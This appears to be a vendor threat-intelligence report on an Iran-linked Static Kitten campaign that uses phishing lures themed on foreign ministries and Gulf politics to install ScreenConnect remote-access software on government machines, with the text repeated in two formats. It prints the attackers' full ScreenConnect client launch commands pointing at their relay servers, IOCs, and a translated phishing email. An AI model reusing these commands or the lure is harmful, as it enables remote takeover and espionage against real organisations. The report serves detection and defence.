Parameters</em></p> <table class="table table-striped break-word"> <thead> <tr> <th>Launch Parameter</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>e=Access</td> <td>Session type: access, meet, support.</td> </tr> <tr> <td>y=Guest</td> <td>ProcessType (Guest or Host).</td> </tr> <tr> <td>h=instance-sy9at2-relay.screenconnect.com</td> <td>URI to reach server’s relay service.</td> </tr> <tr> <td>p=443</td> <td>Port on which relay service operates</td> </tr> <tr> <td>s=6a1e6739-ad4f-4759-8c69-dfe896b9a817</td> <td>The GUID to identify the client.</td> </tr> <tr> <td>k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv</td> <td>The encoded encryption key used to verify the identity.</td> </tr> <tr> <td>&t</td> <td>Is not defined and is the NameCallback Format if the name of the session was to be given.</td> </tr> </tbody> </table> <p>The main launch parameter that indicates this EXE is designed to target MOFAs are the custom c parameters:</p> <ul> <li>&c=mofa</li> <li>&c=mofa.gov.kw</li> </ul> <p>These parameters contain predefined properties that can allow an actor to know which target, or from where, has been infected. In this example the infected target is MOFA.</p> <h3>Second Executable</h3> <p>المنح الدراسیة .exe</p> <p>The ScreenConnect launch parameters from المنح الدراسیة .exe is shown below:</p> <div class="break-word"> <p>"C:\Program Files (x86)\ScreenConnect Client (03b9d0ec9210f109)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-sy9at2-relay.screenconnect.com&p=443&s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv&t=&c=mfa&c=mfa.gov&c=mfa&c=pc&c=&c=&c=&c="</p> </div> <p>The actors again created a custom field parameter, however, this one is kept to a generic MOFA targeting that appears as MFA:</p> <ul> <li>&c=mfa&c=mfa.gov</li> </ul> <h2>Conclusion</h2> <p>Utilizing legitimate software for malicious purposes can be an effective way for threat actors to obfuscate their operations. In this latest example, Static Kitten is very likely using features of ScreenConnect to steal sensitive information or download malware for additional cyber operations. As Static Kitten is assessed to be primarily focused on cyberespionage, it is very likely that data-theft is the primary objective behind propagating ScreenConnect to government agency employees.</p> <p>We will continue monitoring this group for additional malicious activity and provide details when appropriate.</p> <h2>MITRE TTPs</h2> <p>Masquerading - T1036<br/> Phishing - T1566<br/> Remote Access Software - T1219<br/> Spearphishing Attachment - T1566.001<br/> Spearphishing Link - T1566.002<br/> User Execution - T1204<br/> User Execution: Malicious File - T1204.002</p> <h2>Endnotes</h2> <p><sup>[1]</sup> ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, accessed February 8, 2021, published October 2020, https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf, 3.</p> <p><sup>[2]</sup> MuddyWater,” MITRE, accessed February 8, 2021 https://attack.mitre.org/groups/G0069/.</p> <p><sup>[3]</sup> “Kuwait willing to mediate between Iran and Saudi,” Middle East Monitor, accessed February 8, 2021, published February 4, 2021, https://www.middleeastmonitor.com/20210204-kuwait-willing-to-mediate-between-iran-and-saudi/.</p> <p><sup>[4]</sup> Attila Shumelby, “Intelligence Minister Eli Cohen: Netanyahu secretly visited other countries besides the Emirates,” Ynet, accessed February 8, 2021, published, September 9, 2020, https://www.ynet.co.il/news/article/S1v00IFsXP; Jonathan Josephs, “Israel-UAE peace deal ‘big’ for trade in Middle East,” BBC News, accessed February 8, 2021, published October 16, 2020, https://www.bbc.com/news/business-54574022.</p> <p><sup>[5]</sup> ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, 23.</p> <p><sup>[6]</sup> Ibid.</p> <p><sup>[7]</sup> “Wipro Intruders Targeted Other Major IT Firms,” KrebsOnSecurity, accessed February 8, 2021, published April 18, 2019, https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/#more-47453.</p> <p><sup>[8]</sup> Ibid.</p> <p><sup>[8]</sup> Alon Groisman, “Connectwise Control Abused Again to Deliver Zeppelin Ransomware,” Morphisec Blog, accessed February 8, 2021, published December 18, 2019, https://blog.morphisec.com/connectwise-control-abused-again-to-deliver-zeppelin-ransomware.</p> <p><sup>[9]</sup> “CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS,” Tetra Defense, accessed February 8, 2021, https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/.</p> <p><sup>[9]</sup> “Now Let’s Get Tech-y: ScreenConnect’s three main product components create a trio of powerful remote functionality,” ConnectWise Control, accessed February 8, 2021, https://www.screenconnect.com/Remote-Support?t=2&t=2#:~:text=ScreenConnect%20is%20a%20fully%20functional,remote%20support%20on%20the%20fly.</p> <p><sup>[10]</sup> Dennis Schwarz, et al., “TA505 Distributeds New SDBbot Remote Access Trojan with Get2 Downloader, Proofpoint, accessed February 8, 2021, published October 16, 2019, https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader.</p> <h2>IOCs</h2> <p><strong>Docx</strong><br/> 31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535</p> <p><strong>EXE</strong><br/> 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b<br/> 5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b</p> <p><strong>IP</strong><br/> 149.202.216.53</p> <p><strong>URL</strong><br/> https://ws.onehub.com/files/94otjyvd<br/> https://ws.onehub.com/files/7w1372el<br/> instance-sy9at2-relay.screenconnect.com<br/> instance-uwct38-relay.screenconnect.com</p> <p><strong>ZIP</strong><br/> b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf<br/> 77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1</p> <h2>Appendix A</h2> <p>Gentlemen / employees of government agencies</p> <p>Happy New Year</p> <p>After a kind greeting ,,,</p> <p>In view of the situation in the region, especially after the US elections, and concerns about Iran's actions, joint studies have been conducted between the National Media Council and the General Secretariat of the Cooperation Council for the Arab States of the Gulf on counting the political, security and economic consequences of the normalization of relations between Arab countries and Israel. Consequently, the draft studies on negotiations on the normalization of relations between Arab countries and Israel were presented by experts of the member states of the General Secretariat of the Cooperation Council for the Arab States of the Gulf, and in this regard, the National Media Council seeks to conduct a comprehensive survey by the member states.</p> <p>Download the relevant content via the link below.</p> <p>Analysis and study / normalization of relations / Arab countries and Israel / https://nmc.gov.ae</p> <p>Yours sincerely</p> SCREENCONNECT REMOTE ACCESS TOOL UTILIZING MINISTRY OF FOREIGN AFFAIRS-THEMED EXES AND URLS Authored by: Gage Mele, Winston Marydasan, and Yury Polozov KEY FINDINGS * Anomali Threat Research identified a campaign targeting government agencies in the United Arab Emirates (UAE) and likely the broader Middle East. * We assess with medium confidence that the activity is being conducted by Iran-nexus cyberespionage group Static Kitten, due to Israeli geopolitical-themed lures, Ministry of Foreign Affairs (MOFA) references, and the use of file-storage service Onehub that was attributed to their previous campaign known as Operation Quicksand.[1] * The objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties. * Malicious executables and URLs used in this campaign are masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait (mofa.gov[.]kw). * Another sample, including only MOFA (mfa.gov), could be used for broader government targeting. OVERVIEW Anomali Threat Research has uncovered malicious activity very likely attributed to the Iran-nexus cyberespionage group, Static Kitten (Seedworm, MERCURY, Temp.Zagros, POWERSTATS, NTSTATS, MuddyWater), which is known to target numerous sectors primarily located in the Middle East.[2] This new campaign, which uses tactics, techniques, and procedures (TTPs) consistent with previous Static Kitten activity, uses ScreenConnect launch parameters designed to target any MOFA with mfa[.]gov as part of the custom field. We found samples specifically masquerading as the Kuwaiti government and the UAE National Council respectively, based on references in the malicious samples. In mid-2020, the UAE and Israel began the process of normalizing relations. Since then, tensions have further escalated in the region, as reported by numerous sources. The targeting of Kuwait could be tied to multiple factors, including Kuwait’s MOFA making a public statement that they were willing to lead mediation between Iran and Saudi Arabia.[3] Furthermore, in October 2020, trade numbers for a peace deal between Israel and UAE included an estimate for the creation of 15,000 jobs and $2 billion in revenue on each side.[4] In that same month, Static Kitten reportedly conducted Operation Quicksand, which targeted prominent Israeli organizations and included the use of file-storage service OneHub.[5] DETAILS We identified two lure ZIP files being used by Static Kitten designed to trick users into downloading a purported report on relations between Arab countries and Israel, or a file relating to scholarships. The URLs distributed through these phishing emails direct recipients to the intended file storage location on Onehub, a legitimate service known to be used by Static Kitten for nefarious purposes.[6] Anomali Threat Research has identified that Static Kitten is continuing to use Onehub to host a file containing ScreenConnect. The delivery URLs found to be part of this campaign are: * ws.onehub[.]com/files/7w1372el * ws.onehub[.]com/files/94otjyvd File names in this campaign include: * تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.ZIP * تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe * الدراسیة .zip * الدراسیة .exe * مشروع .docx Translated file names * Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.zip * Analysis and study of the normalization of relations between the Arab countries and Israel httpsmod.gov.kw.exe * Scholarships.zip * Scholarships.exe * Project.docx Static Kitten’s objective is to direct users to a downloader URL (ws.onehub[.]com/files/7w1372el which downloads a ZIP file) via a phishing email that impersonates an EXE (تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod[.]gov.kw.exe). This EXE purports to be a report on Arabic countries and Israel relations but, when executed, actually launches the installation process for ScreenConnect. A similar second sample uses .docx file that tries to direct users to ws.onehub[.]com/files/94otjyvd which downloads a ZIP file called لدراسیة .zip. An EXE inside the ZIP of the same name will also begin the ScreenConnect installation process when executed. An overview of the infection chain is shown in Figure 1below. Figure 1 - Static Kitten Campaign Infection Chain LURE DOCUMENT ANALYSIS Static Kitten is distributing at least two URLs that deliver two different ZIP files that are themed to be relevant to government agency employees. The URLs are distributed through phishing emails with lure and decoy documents. An example lure is shown in Figure 2 below. Figure 2 – Static Kitten Lure Document .docx The .docx file shown in Figure 2 directly refers to government agency recipients while highlighting concerns about recent Iranian actions, the impact of the US elections, and joint studies by government entities on relations between Arabic countries and Israel. The actors reference multiple official agencies, including the General Secretariat of the Cooperation Council for the Arab States of the Gulf and the UAE National Media Council, likely in an effort to add the appearance of legitimacy. A full translation of this document can be viewed in Appendix A. The hyperlink in the .docx file is impersonating the UAE National Media Council, however, the actual link directs to ws.onehub.com/files/7w1372el. The second file is a ZIP called الدراسیة .zip (see Figure 3). We cannot determine the delivery method for this ZIP, but it is likely similar to the .docx email delivery method of the first download URL. The geopolitical-themed ZIP contains an EXE file with the same name that begins the installation process for ScreenConnect when executed (see Figure 4). Figure 3 – Download URL ws.onehub.com/files/94otjyvd for Malicious ZIP الدراسیة .zip Figure 4 - ScreenConnect Installation TECHNICAL ANALYSIS SCREENCONNECT AND ONEHUB CONTEXT Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro.[7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme.[6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. This lead to the delivery of Zeppelin and other VegaLocker ransomware variants, Vidar information stealer, Cobalt Strike beacons, PS2EXE tools, and banker Trojans.[7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware.[8] Remote desktop management software is a common target and tool used by threat actors because of the wide variety of functionalities they offer. ScreenConnect offers three primary functions that each contain different valuable features for threat actors. ScreenConnect’s capabilities are shown in Table 1 below. Table 1 - ScreenConnect Capabilities[9] Feature Functions Remote Support Remote control and viewing of any internet-connect device. Unattended Access Persistent connection allows behind-the-scenes, remote control of any machine or server. Meetings Standard screen-sharing meetings with chat and voice communication, record video, and take screenshots. The cybercriminal group Graceful Spider (TA505, Gold Evergreen, TEMP.Warlock, Hive0065, Chimborazo, FIN11) distributed spearphishing emails impersonating Onehub in 2019 in attempts to trick users into downloading the SDBbot remote access trojan (RAT).[10] Onehub’s file-storage services are also utilized in malspam emails to host various malware, as is common with other file storage locations abused by multiple threat actors. FIRST EXECUTABLE تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe When a user tries to double click the executable تحليل ودراسة تطبيع العلاقات الدول العربية واسرائيل httpsmod.gov.kw.exe (Screenconnect payload), it drops the Microsoft installer file. This begins the installation of the client payload onto victim machines. While the actors attempted to make the installation appear legitimate, closer inspection of the client launch parameters reveals the potential for broader MOFA targeting. The client service launch parameters are: "C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-uwct38-relay.screenconnect.com&p=443&s=defc756e-8027-47b6-b67f-400b5152b0f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAtuFTxmBL02KmPrJD46iRMPemIxmEf5ugjlUMfa193CjLMeH9pna2eM0ZGHYhe3MZHUEAByA4fhpInP5kKnkrPl%2fjhxwjHSIaKZ%2bMobL27iSLf8tgmCtGJTTZndViJcMcp4v0yqJOMxVuUdPraZ%2fTvrw6wZpECq7LCGncZGOri%2fqQVFUqsIDZZzhQye6zfkCg0DgxxPf4aQzjgqQo20dJeQDIEEb0sy7FPiSde3VVxTmp%2fMB3Ho%2bK3mobu743glaeTOq0aIsvXASRKb5xB1f4pFUMi1mETUoGgWL%2f6qhNk65scRZmECWvs7O8ajulQMiSPQj9lUOejdBR9taEB8Byz&t=&c=mofa&c=mofa.gov.kw&c=mofa&c=pc&c=&c=&c=&c=" While the ScreenConnectclient agent is being installed, the server component expects a connection and the server can identify the client agent through a public key thumbprint. The thumbprint is a 16 character string located at "C:\Program Files (x86)\ScreenConnect Client (a97eeae2330a1851)” Analysis of the authentic launch parameters passed back to the server as part of Screenconnect functionality is shown in Table 2 below. Table 2 - ScreenConnect Launch Parameters Launch Parameter Description e=Access Session type: access, meet, support. y=Guest ProcessType (Guest or Host). h=instance-sy9at2-relay.screenconnect.com URI to reach server’s relay service. p=443 Port on which relay service operates s=6a1e6739-ad4f-4759-8c69-dfe896b9a817 The GUID to identify the client. k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv The encoded encryption key used to verify the identity. &t Is not defined and is the NameCallback Format if the name of the session was to be given. The main launch parameter that indicates this EXE is designed to target MOFAs are the custom c parameters: * &c=mofa * &c=mofa.gov.kw These parameters contain predefined properties that can allow an actor to know which target, or from where, has been infected. In this example the infected target is MOFA. SECOND EXECUTABLE المنح الدراسیة .exe The ScreenConnect launch parameters from المنح الدراسیة .exe is shown below: "C:\Program Files (x86)\ScreenConnect Client (03b9d0ec9210f109)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-sy9at2-relay.screenconnect.com&p=443&s=6a1e6739-ad4f-4759-8c69-dfe896b9a817&k=BgIAAACkAABSU0ExAAgAAAEAAQCVzMmjXhdfu5xyqTHPWDSj9Qjbq%2bQlIQursvinhHWO9UWKiTPrrR7quzVCpids4AagFWBCbS6cfow4bTxdtZyrd%2fNQQRVUcQ%2f%2boszJVH6S1JEpmF6ZPruFKyy1yr%2fEuxhNcHAWNf0CQKhhVsK0rXVlRE%2b4%2f4v%2fk%2f7%2bHPg2kwhmBHFZTJVd7xADVdVuYESMiCmu4gx8Akf9aAE2RUz9LjSiCU6LwJtp4AjjMCaGLFSaragsfZ1e%2fD9UEEee8n0J69HLcLoY%2fW8w8RKqQXILC9S3ONSkepA4UHcptKwP5GXogluNbG7UdgiaynRL%2b31oTHOZ32giSoxHDGHc3WphKwDv&t=&c=mfa&c=mfa.gov&c=mfa&c=pc&c=&c=&c=&c=" The actors again created a custom field parameter, however, this one is kept to a generic MOFA targeting that appears as MFA: * &c=mfa&c=mfa.gov CONCLUSION Utilizing legitimate software for malicious purposes can be an effective way for threat actors to obfuscate their operations. In this latest example, Static Kitten is very likely using features of ScreenConnect to steal sensitive information or download malware for additional cyber operations. As Static Kitten is assessed to be primarily focused on cyberespionage, it is very likely that data-theft is the primary objective behind propagating ScreenConnect to government agency employees. We will continue monitoring this group for additional malicious activity and provide details when appropriate. MITRE TTPS Masquerading - T1036 Phishing - T1566 Remote Access Software - T1219 Spearphishing Attachment - T1566.001 Spearphishing Link - T1566.002 User Execution - T1204 User Execution: Malicious File - T1204.002 ENDNOTES [1] ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, accessed February 8, 2021, published October 2020, https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf, 3. [2] MuddyWater,” MITRE, accessed February 8, 2021 https://attack.mitre.org/groups/G0069/. [3] “Kuwait willing to mediate between Iran and Saudi,” Middle East Monitor, accessed February 8, 2021, published February 4, 2021, https://www.middleeastmonitor.com/20210204-kuwait-willing-to-mediate-between-iran-and-saudi/. [4] Attila Shumelby, “Intelligence Minister Eli Cohen: Netanyahu secretly visited other countries besides the Emirates,” Ynet, accessed February 8, 2021, published, September 9, 2020, https://www.ynet.co.il/news/article/S1v00IFsXP; Jonathan Josephs, “Israel-UAE peace deal ‘big’ for trade in Middle East,” BBC News, accessed February 8, 2021, published October 16, 2020, https://www.bbc.com/news/business-54574022. [5] ClearSky Cyber Security, “Operation Quicksand: Muddywater’s Offensive Attack Against Israeli Organizations,” ClearSky, 23. [6] Ibid. [7] “Wipro Intruders Targeted Other Major IT Firms,” KrebsOnSecurity, accessed February 8, 2021, published April 18, 2019, https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/#more-47453. [8] Ibid. [8] Alon Groisman, “Connectwise Control Abused Again to Deliver Zeppelin Ransomware,” Morphisec Blog, accessed February 8, 2021, published December 18, 2019, https://blog.morphisec.com/connectwise-control-abused-again-to-deliver-zeppelin-ransomware. [9] “CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS,” Tetra Defense, accessed February 8, 2021, https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/. [9] “Now Let’s Get Tech-y: ScreenConnect’s three main product components create a trio of powerful remote functionality,” ConnectWise Control, accessed February 8, 2021, https://www.screenconnect.com/Remote-Support?t=2&t=2#:~:text=ScreenConnect%20is%20a%20fully%20functional,remote%20support%20on%20the%20fly. [10] Dennis Schwarz, et al., “TA505 Distributeds New SDBbot Remote Access Trojan with Get2 Downloader, Proofpoint, accessed February 8, 2021, published October 16, 2019, https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader. IOCS Docx 31a35e3b87a7f81449d6f3e195dc0660b5dae4ac5b7cd9a65a449526e8fb7535 EXE 3e4e179a7a6718eedf36608bd7130b62a5a464ac301a211c3c8e37c7e4b0b32b 5bfb635c43eb73f25f4e75961a715b96fa764bbe096086fc1e037a7869c7878b IP 149.202.216.53 URL https://ws.onehub.com/files/94otjyvd https://ws.onehub.com/files/7w1372el instance-sy9at2-relay.screenconnect.com instance-uwct38-relay.screenconnect.com ZIP b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf 77505dcec5d67cc0f6eb841f50da7e7c41a69419d50dc6ce17fffc48387452e1 APPENDIX A Gentlemen / employees of government agencies Happy New Year After a kind greeting ,,, In view of the situation in the region, especially after the US elections, and concerns about Iran's actions, joint studies have been conducted between the National Media Council and the General Secretariat of the Cooperation Council for the Arab States of the Gulf on counting the political, security and economic consequences of the normalization of relations between Arab countries and Israel. Consequently, the draft studies on negotiations on the normalization of relations between Arab countries and Israel were presented by experts of the member states of the General Secretariat of the Cooperation Council for the Arab States of the Gulf, and in this regard, the National Media Council seeks to conduct a comprehensive survey by the member states. Download the relevant content via the link below. Analysis and study / normalization of relations / Arab countries and Israel / https://nmc.gov.ae Yours sincerely GET THE LATEST ANOMALI UPDATES AND CYBERSECURITY NEWS – STRAIGHT TO YOUR INBOX Become a subscriber to the Anomali Newsletter Receive a monthly summary of our latest threat intelligence content, research, news, events, and more. Subscribe Today EXPLORE MORE TOPICS Anomali Anomali Copilot Anomali Cyber Watch Anomali Match Anomali Security Operations Platform Compliance Cyber Threat Intelligence ISAC Malware Modern Honey Network Research SIEM SOAR STAXX Splunk Threat Intelligence Platform ThreatStream UEBA Research 808 Winslow Street , Redwood City, CA, 94063, United States +1 844 4 THREATS (847328) +44 8000 148096 (International Toll-Free) general@anomali.com Platform and Products Anomali PlatformAnomali CopilotIntegratorAnomali Security AnalyticsAnomali ThreatStreamAnomali Intelligence Channels Marketplace Anomali MarketplaceThreat Intelligence FeedsThreat Analysis Tools and EnrichmentsSecurity System PartnersMarketplace for Partners Partners Partners OverviewJoin the Technology Partner ProgramAnomali SDKsThreat Intel SharingPartner Portal Login Resources Resource LibraryBlogEventsDetect LIVESupport Company About AnomaliLeadership Company About UsLeadershipCareersPress RoomContact UsSchedule Demo CareersPress Room Contact UsSchedule Demo © Copyright 2024 Anomali®. All rights reserved. ThreatStream® is a registered trademark of Anomali Inc. Anomali Match™ ("Match") and Anomali Lens™ ("Lens") are trademarks of Anomali Inc. Privacy PolicyTerms of UseCookies PolicySecurity By clicking “Accept”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Cookie Policy for more information. PreferencesDenyAccept Privacy Preference Center Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types of storage that are not necessary, but this may affect your website experience. Reject all cookiesAllow all cookies Manage Consent Preferences by Category Essential Always Active These are required to enable basic website functionality. Analytics Essential These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues. Marketing Essential We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns. Personalization Essential These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features. Confirm my preferences and close Platform and Products The Anomali Platform Exposure Management Attack Surface ManagementDigital Risk Protection Detection and Response Anomali Security Analytics Threat Intelligence Management ThreatStreamAnomali Intel Channels Security Automation CopilotLensIntegrator Free Tools Anomali Cyber WatchSTAXXThe Anomali Newsletter Marketplace Threat Intelligence FeedsThreat Analysis Tools and EnrichmentsSecurity System PartnersMarketplace for Partners Partners Partners OverviewJoin the Technology Partner ProgramAnomali SDKsThreat Intel SharingPartner Portal Login Collaborate Community OverviewCISO EventsCISO ResourcesCISO Blog Resources Browse Resource LibraryWhat is Threat Intelligence?What is Security Analytics?Threat Intelligence SharingWhat is a Threat Intelligence Platform (TIP)?What are STIX/TAXII?What is MITRE ATT&CK?What is a Cyber Fusion Center?What is SOAR? Company About AnomaliAnomali Press RoomEventsDetect LIVELeadershipReviewsAwardsCareers Schedule Demo Contact Support Blog © Copyright 2024 Anomali®. All rights reserved. ThreatStream® is a registered trademark of Anomali Inc. Anomali Match™ ("Match") and Anomali Lens™ ("Lens") are trademarks of Anomali Inc. Privacy PolicyTerms of UseCookies PolicySecurity By clicking “Accept”, you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Cookie Policy for more information. PreferencesDenyAccept Privacy Preference Center Our website uses cookies to enhance your experience. Some cookies are essential for basic functionality, while others are used for marketing, analytics, and personalization. You can choose to disable certain types of storage that are not necessary, but this may affect your website experience. Reject all cookiesAllow all cookies Manage Consent Preferences by Category Essential Always Active These are required to enable basic website functionality. Analytics Essential These help us understand how the website performs, how visitors interact with the site, and whether there may be technical issues. Marketing Essential We use these to deliver advertising that is more relevant to you and your interests. We also use them to limit the number of times you see an advertisement and measure the effectiveness of advertising campaigns. Personalization Essential These items allow the us to remember choices you make (such as your user name, language, or the region you are in) and provide enhanced, more personal features. Confirm my preferences and close